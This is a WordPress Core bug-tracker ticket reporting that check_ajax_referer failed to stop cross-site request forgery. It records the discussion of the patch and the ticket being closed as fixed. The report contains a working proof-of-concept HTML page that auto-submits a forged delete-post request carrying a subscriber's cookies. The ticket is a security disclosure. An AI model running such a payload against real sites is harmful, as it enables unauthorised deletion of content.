WordPress.org

Make WordPress Core

Opened 7 years ago

Closed 7 years ago

#4939 closed defect (bug) (fixed)

check_ajax_referer does not protect from CSRF at all

Reported by: xknown Owned by:
Milestone: 2.3 Priority: high
Severity: normal Version: 2.3
Component: Security Keywords:
Focuses: Cc:

Description

check_ajax_referer only checks if the incoming request contains valid user credentials but wp_get_current_user still uses WP cookies to determine the current user, so anyone with a subscriber role (or another role) can perform CSRF attacks.

<html>
<body>
	<form method="post" action="http://localhost/wp/wp-admin/admin-ajax.php">
		<input type="text" name="action" value="delete-post" />
		<input type="text" name="id" value="Post_ID" />
		<input type="text" name="cookie" value="wordpressuser_sitehash=subscriber; wordpresspass_sitehash=password" />		
	</form>
	<script>document.forms[0].submit();</script>
</body>
</html>

Attachments (2)

pluggable.diff (357 bytes) - added by xknown 7 years ago.
Set current user in check_ajax_referer.
4939.diff (977 bytes) - added by mdawaffe 7 years ago.

Download all attachments as: .zip

Change History (5)

xknown7 years ago

Set current user in check_ajax_referer.

comment:1 mdawaffe7 years ago

Rather than setting the user, we could check to see if the current user matches the user from the cookie and die('-1') otherwise.

mdawaffe7 years ago

comment:2 Nazgul7 years ago

  • Milestone set to 2.3
  • Priority changed from normal to high

comment:3 ryan7 years ago

  • Resolution set to fixed
  • Status changed from new to closed

(In [6138]) Extra protection in check_ajax_referer from mdawaffe. fixes #4939

Note: See TracTickets for help on using tickets.